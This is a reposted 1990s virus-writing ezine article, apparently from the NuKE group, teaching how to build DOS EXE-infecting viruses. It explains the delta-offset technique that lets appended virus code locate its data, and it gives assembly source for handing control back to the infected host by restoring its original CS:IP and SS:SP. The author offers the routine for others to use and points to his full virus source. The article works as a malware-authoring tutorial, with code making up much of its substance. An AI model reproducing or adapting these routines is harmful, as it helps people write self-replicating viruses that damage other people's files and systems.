Copy Link
Add to Bookmark
Report

EXE infection: Part II

eZine's profile picture
Published in 
the diabolic JUDGES
 · 2 years ago

By Rock Steady/NuKE

The first part consisted on how to Infect the EXE file, from a resident virus. However, that is only HALF the code and understanding needed for EXE infectors. The part to follow, is on how to give control back to the original EXE file. This is one part of EXE infectors, that mostly EVERY ONE tend to forget to point out. Big tickle, you know how to infect the EXE, but can you make the original EXE run after its infection? Do you know how to restore the registers we took from the EXE header? Anyhow lets get going...

If the Infected EXE file is now executed, the first Line of Code it will encounter will be the first byte of our Virus. Since CS:IP have been changed in the header (Part I) to point to our Virus. The first thing we will need to do, is set up a Variable offset, (As I call it). Basically when TASM compiles our virus, all variables and other data locations are given a FIX address. Though in the case of the Virus this is NOT GOOD as viruses, tend to append themselves, and therefore variables are never in the same location...

  Fig 1. 

(Original ASM Source)
CALL doit_Now ;Call PUSHes CS:IP addresses
doit_now: POP BP ;POP in BP the IP register
SUB BP,offset doit_now ;Make it EQUAL 0 for first Compile!
MOV AX,word ptr cs:[variable+BP] ;BP=0 now it works!
...
variable dd 55

When TASM Compiles the above Code it turns it into Fig 2. (Below)

  Fig 2.                               Fig 3. 

(Virus Just Compiled) (Virus Infect to a file)
1234:0100 CALL 1234:0103 1234:0100 JMP 500
1234:0103 POP BP 1234:0102 ... (Infect File)
1234:0104 SUB BP,0103 ... '' ''
1234:0107 MOV AX,[0200+BP] 1234:0200 ... '' ''
... ... '' ''
1234:0200 dd 55 1234:0500 CALL 1234:0503
1234:0503 POP BP (BP=503)
1234:0504 SUB BP,0103 (BP=400)
1234:0507 MOV AX,[0200+BP]
... (200+BP=600)
1234:0600 dd 55

Later when the Virus infects a File, it will represent Fig 3. Now, when the CALL command is executed, it PUSHes into the Stacks the NEXT CS:IP so when it has to RETurn, all it has to do is POP back the CS:IP to know exactly where it left off! So we can take advantage of the command, by POPing back ourselves, thus this will give us the NEXT byte from the CALL command. which as you see, in the examples is our POP BP statement.

However when the Virus is Freshly Compiled, all Registers values are GOOD, so that is why we must make BP=0 the first time, as the variables were set according to the sources, so no adjustment needed, though when we infect a file, this BP Variable Pointer come ALIVE! (View Fig 3. + Fig 2.)

Boy, That was the HARDEST part of that, Now if you found that simple pat yourself on the back, as that is the only `BIG' Conflict people tend to disregard or forget. So any time while you are NOT resident but infected on the file, and you are running code from the infected file just use the that BP Variable Pointer, for any data being loaded... Now lets put the routine together, along with the routine to EXECUTE the original EXE file

  ; After the Virus Has moved a copy of itself in memory, Control must be 
; Given back to the Original EXE file we just infected... This is the
; Routine to do it..
exit_exe_file:
mov bx,word ptr cs:[buffer+22][bp] ;Loads CS register
mov ax,cs ;Move current CS in AX
sub ax,bx ;Subtract for alinment
mov dx,ax
add ax,word ptr cs:[exe_cs][bp] ;Get ORIGINAL CS
add dx,word ptr cs:[exe_ss][bp] ;Get ORIGINAL SS
mov bx,word ptr cs:[exe_ip][bp] ;Get ORIGINAL IP
mov word ptr cs:[fuck_yeah][bp],bx ;Put IP
mov word ptr cs:[fuck_yeah+2][bp],ax ;Put CS (Reverse Order)
mov ax,word ptr cs:[exe_sp][bp] ;Get ORIGNAL SP
mov word ptr cs:[Rock_fix1][bp],dx ;Put in SS
mov word ptr cs:[Rock_fix2][bp],ax ;Put in SP
db 0B8h ;The Byte `B80000' is really a MOV AX,????
Rock_Fix1: ;???? is the Value of SS that we will put into
dw 0 ;THIS LINE!
cli ;Disable Interrupts (No Jamming)
mov ss,ax ;Mov the AX (really SS) into SS register
db 0BCh ;Byte `BC0000' is really a MOV SP,????
Rock_Fix2: ;???? is the Value of SP that we will put into
dw 0 ;THIS LINE!!
sti ;Enable Interrupts
db 0EAh ;The Byte `EA00000000' is a JMP CS:IP How ever
fuck_Yeah: ;IP comes FIRST then CS (Reverse Order) And then
dd 0 ;the Virus does the JMP CS:IP to the Original
; Simple huh?
; To see this as a HOLE Virus look at `NuKE PoX V1.1' Virus Sources Codes
; Made by me (Rock Steady) As you can see the Code is ORGINAL, and nothing
; that looks like any of them Sources we see around. Though I give it to
; you to use.

Rock Steady / NuKE
`One, Two, One, Two, One, Two... Come On Get into that Olympic Spirit'
`Lose Them pounds, Get Rid of that unwanted FAT of them Drives...'

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT